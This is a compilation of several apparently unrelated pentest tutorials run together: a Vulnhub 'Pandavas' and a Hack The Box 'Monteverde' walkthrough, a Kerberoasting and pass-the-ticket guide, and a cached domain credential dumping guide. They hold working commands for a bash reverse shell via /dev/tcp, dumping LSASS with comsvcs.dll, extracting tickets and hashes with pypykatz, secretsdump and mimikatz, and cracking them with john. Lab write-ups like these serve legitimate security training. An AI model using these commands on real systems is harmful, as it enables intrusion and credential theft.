HA: Pandavas Walkthrough

Today we're going to solve another boot2root challenge called "Pandavas". It's available at Vulnhub for penetration testing practice. This lab is not difficult if we have the right basic knowledge to break the labs and are attentive to all the details we find during the reconnaissance. The credit for making this lab goes to Hacking Articles. Let's get started and learn how to break it down successfully.

Level: Not defined

Since these labs are available on the Vulnhub website. Let's download the lab file from here.

Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         Snmpwalk

·         Dirb

·         CeWL

·         Bruteforce with metasploit

·         LinEnum

Exploiting

·         SSH login

·         Dockers Services

·         Mysqldump

Privilege Escalation

·         Abusing SUDO

·         Capture the flag

Walkthrough

Reconnaissance

As always we identify the host's IP with the "Netdiscover" tool:

So, let's start by listing all the TCP ports with nmap.

$ nmap -sV -p- 192.168.10.162

Then, we will do a second scan but pay attention, we will add to the command "-sU" to get the UDP services.

This second check for UDP services will take longer, so while nmap is finishing, we will take the opportunity to check the TCP services found.

Enumeration

We start by visiting the web service (port 80), we find several pictures and information about the Pandavas, we check the source code and robots.txt, it seems that there is nothing useful. (or at least, for the moment)

With the help of Dirb, we will use a big dictionary of words and a short one with more known extensions and we will find a file called "hidden.docx"

We downloaded the "hidden.docx" file:

We open the document, it gives us more details of the history of the "Pandalas", below we see a clue that will lead us to the first flag.

We copy the text and paste it in nano or another text editor, there the flag will appear by magic.

Now, in the enumeration of UDP services, we detect an SNMP service (port 161), this service is usually misconfigured with a "public" channel where it usually shows confidential information of services and other applications of an organization.

For this we will use the tool "snmpwalk" and there we will find the second flag and a user name of the machine.

$ snmpwalk -v1 -c public 192.168.10.162 |more

Exploiting

We already have a user, but we are missing the password, I tried a dictionary with the 1000 most used passwords, but our friends from "Hacking Articles" were not going to make it easy for us. So I had to create a custom dictionary using the web service page (remember, port 80).

Once our dictionary is created, we use the "SSH LOGIN" module from metasploit, we configure it with the user "karna" and with our custom dictionary.

Perfect! So now we connect via SSH and start exploring the inside of the machine.

Once inside, we can list the other two users, we check files and binaries that we have permissions, but it doesn't work for us.

So we launch another credentials listing with the metaploit bruteforce specifying the user "krishna”.

Great! We authenticate with the user "krishna":

With this user, we have sudo access to everything, so we could run a reverse shell as sudo, get root privileges, read the root flag and game over… But we'd still be two flags short of completing the challenge!

We listed the machine's interfaces and found that there is a docker presence in at least three services.

Now we'll list the docker processes that are running on the machine and we'll list an FTP service and a MySQL that seem quite interesting.

Start with the FTP service connect:

Go to the "root" folder, find a file called ".ash_history", read it and get a flag and credentials encoded in Base64.

Decode the string in base64 and get a password.

We will now connect to Docker's MySQL service:

We'll break into the database with the credentials "root" and the password "ignite@123". We will help ourselves with the following command:

$ mysqldump -A –u root –password=ignite@123

Perfect, we already have the four flags, now we just need to climb privileges as "root" user and read the flag.

Privilege Escalation

There are many ways to get root, I put a terminal with netcat listening on port 4444 and used the following command to raise in my kali a reverse shell as root:

In our kali: $ nc -nvlp 4444

On the victim machine: $ sudo -u root bash -i >& /dev/tcp/192.168.10.161/4444 0>&1

Now we execute the command in the victim machine and we get a shell as root in our kali.

And now yes, we read our beloved root flag and get the fifth and final flag:

Kerberosting and Pass the Ticket Attack Using Linux

Kerberosting and Pass the Ticket Attack Using Linux

In our previous post, we explained the Kerberosting attack in detail, which you can read from here. I recommend, then, to revisit our previous article for better understanding before implementing the attack mentioned in this section.

In this post we will discuss how to perform a kerberosting attack and remotely pass the Kerberos ticket using Kali Linux. Kerberoasting is considered to be lateral movement, so once you have penetrated the domain client system and obtained the computer shell, then use the following method for abusing kerberos.

Table of Content

Pass the ticket

·         kirbi2ccache

·         GetTGT.py

Kerberoasting

·         Kirbi2john

Pass the Ticket: kirbi2ccache

In order to abuse kerberos againt pass the ticket or kerberoasting attack we need to import DMP file in our local machine (Kali Linux) through Client machine and to do this execute the following command through meterpreter session.

load powershell

powershell_shell

Get-Process Lsass

cd C:\Windows\System32

.\rundll32.exe comsvcs.dll, MiniDump 628 C:\lsass.DMP full

Why we need Lsass.Dmp file?

Because LSASS.DMP stores the TGT & TGS ticket in the kirbi format for some period of time and using this DMP file we can obtain following:

·         NTLM HASH of User

·         KRB5_TGT ticket

·         KRB5_TGS ticket

·         NTLM HASH for Service

Once you have dumped the lsass.dmp, download it on your local machine for extracting kirbi files.

download lsass.DMP /root/Desktop/

Download and install pypykatz for extracting stored kerberos tickets in Kribi format from inside the lsass.DMP file by executing the following commands

mkdir /root/kerb

pypykatz lsa -k /root/kerb minidump /root/Desktop/lsass.DMP

As you can observe we have obtained all kerberos ticket in kribi format as well as the NTLM HASH for user Yashika. 

Currently we have enumerated the KRB5_TGT ticket authorized for user “Yashika”. Let try to pass the ticket to get TGS and access the requested services.

Kirbi2ccache is a python script that falls under the Impacket library, transforming the kirbi format file into ccache and then using Export KRB5CCCNAME to inject the ccache file into DC to get access to the requesting service.

kirbi2ccache TGT_IGNITE.LOCAL_yashika_krbtgt_IGNITE.LOCAL_6d469878.kirbi yashika.ccache

export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Impacket GetTGT.py

Likewise, this can also be accomplished with the help of getTGT.py, as it will request a TGT and save it as ccache by giving a password, hash or aesKey.

If you recall that for user Yashika we have extracted the NTLM HASH. Now we have used the following command to request a TGT from DC and save it in CCache format. Laterally we can inject the ccache file into DC with the help of Export KRB5CCNAME to get access to the requesting service.

python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika

export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local

Kerberosasting: kribi2john

As we said with the help of stored KRB5_TGS, we can extract the NTLM hashes for Service Server and try to crack the hash in order to get the password in clear text or use this hash to pass the hash attack. This would be known as kerberosasting.

Now as you can see in the highlight image we've outlined the KRB5_TGS for SQL Server in kirbi format and converted it to john crackable format with the help of kirbi2john.py (possible at /usr / share / john/) called "TGS hash;" then use john for brute force password.

/usr/share/john/kirbi2john.py   >

john –wordlist=/usr/share/wordlistsrockyou.xtx TGS_hash

Booom!!!! We found the password for SQL service server.

Hack the Box: Monteverde Walkthrough

Today we're going to solve Hack The Box's "Monteverde" machine. This lab is of "medium" level, although you will see that it is quite simple.

Level: Medium

Penetration Testing Methodology

·         Reconnaissance

·         Nmap

·         Enumeration

·         Enum4Linux

·         Bruteforce SMB Login (metasploit)

·         Smbclient

·         Exploiting

·         Evil-winrm

·         Powershell Scripts

·         Privilege Escalation

·         Abuse of Azure's group privileges

·         Capture the flag

Walkthrough

Reconnaissance

We start with a scan of the 5,000 main ports:

$ nmap -sV –top-ports 5000 10.10.10.172

Enumeration

After checking each of the services, it is time to obtain as much information as possible from the Samba service (port 445) with the help of the "Enum4linux" tool.

 

We list the domain name:

And list of users that belong to the corporation:

Exploiting

We create a file "users.txt" and introduce the different users found in the previous phase.

Now and with the "smb_login" module of metasploit, we make a brute force, we will indicate the same file "users.txt" for the option "user_file" and "pass_file". Disable the "verbose" mode so that only positive results appear.

We'll get a match, so we already have some credentials to be able to gossip in the organization's files.

We use the credentials and see that we have several areas to check.

I'll save you time and we'll access the "users$" resource.

Privilege Escalation (user)

We access the user's folder "mhope" and find a file called "azure.xml". Of course, my friend! We downloaded it!

We execute the command "cat" on the file "azure.xml" and find some access credentials for the user "mhope".

We use these credentials to connect by RDP (Remote Desktop Protocol) service with the help of "Evil-winrm" and we will read the "user.txt" flag.

Privilege Escalation (administrator)

We execute the command "whoami /all" to obtain all the information of our committed user.

We found in the information that we belong to the group of administrators of Azure.

Now, we will leave the "Evil-winrm" session and download the following script in Powershell called "Azure-ADConnect.ps1".

And we'll connect again with "Evil-winrm", but this time, we'll specify a new command to indicate the path where the "Azure-ADConnect" file is located.

The following commands, will make the script load in Powershell in our Evil-winrm, the second command will make it synchronize with the Active Directory located in Azure and will return us the administrator credentials.

Once we have obtained the administrator credentials, we will connect to them again and read the "root.txt" flag.

Credential Dumping: Domain Cache Credential

In this post we are going to discuss the domain cache credential attack and various technique to extract the password hashes by exploiting domain user.

Table of Content

·         Domain Cache credential

·         Metasploit

·         Impacket

·         Mimikatz

·         PowerShell Empire

·         Koadic

·         Python Script

Domain Cache credential (DCC2)

Microsoft Windows stores previous users' logon information locally so that they can log on if a logon server is unreachable during later logon attempts. This is known as Domain Cache credential (DCC) but in-actually it is also known as MSCACHE or MSCASH hash. It sorted the hash of user’s password that you can’t perform pass-the-hash attacks with this type of hash. It uses MSCACHE algorithm for generating password hash and that are stored locally in the Windows registry of Windows operating system. These hashes are stored in the Windows registry, by default the last 10 hashes.

There two version of MSCASH/MSCACHE or DCC

·         MSCACHEV1 or DCC1 used before Vista Server 2003

·         MSCACHEV2 or DCC2 used after Vista & Server 2003

Walkthrough

Metasploit

Metasploit helps the pen tester to extract the stored hashes by exploit registry for MSCACHE stored hashes. This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.

use post/windows/gather/cachedump

set session2

exploit

As result it will dump the password hashes, and these fetched from inside DCC2/MSCACHE as shown in the image given below.

Impacket

This hash can be extracted using python impacket libraries, this required system and security files stored inside registry. With the help of the following command you can pull out these files from the registry and save on your local machine.

reg save hklm\system c:\system

reg save hklm\security  c:\secuirty

Further copy the system and security file on that platform where impacket is installed, in our case we copied it inside kali Linux and use following for extracting DCC2/MSCACHE hashes.

python secretsdump.py -security -system system LOCAL

Boom!!!! You will get the DCC2/MSCACHEv2 hashes on your screen.

Mimikatz

As we all know, mimikatz is one of the best penetration testing tools for credential dumping windows. So, we can get DCC2 / MSCACHEv2 hashes using mimikatz by installing it on a compromised host and executing the following command:

privilege::debug

token::elevate

lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

PowerShell Empire

Moving to our next technique, PowerShell Empire, has a module that extracts the MSCACHEV2 hashes from the inside registry of the compromised machine. So, download and run Empire on your local machine and compromise the host machine once to use the empire post module and then type as follows:

usemodule credentails/mimikatz/cache

set agent

execute

And again, you will get the MSCACHEv2 hashes on your screen.

Koadic

Just like the Powershell empire, you can use koadic to extract the DCC2 hashes. You can read more about koadic from here. Run following module to hashes:

use mimikatz_dotnet2js

set MIMICMD lsadump::cache

And again, you will get the MSCACHEv2 hashes on your screen.

Python Script

Just like impacket, you can download the MSCACHEV2 python script to extract the stored hashes. Download the script from github and then use security and system files  (As discussed in Impacted)

python mscache.py –security /root/Desktop/security –system /root/Desktop/system

And again, you will get the MSCACHEv2 hashes on your screen.

Cracking DCC2 or MACHACHE2/MSCASH2

As we know these hashes are not used in PASS The Hash attack, thus we need use john the ripper to crack these hashes for utilising it.

john –format=mscasch2 –wordlist=/usr/share/wordlists/rockyou.txt mhash

As result, it has dumped the password in clear txt for the given hash file. Hence don’t get confused between DCC2 or MSCACHEV2/MSCASH hash these all are same and you can used above discussed method to extract them.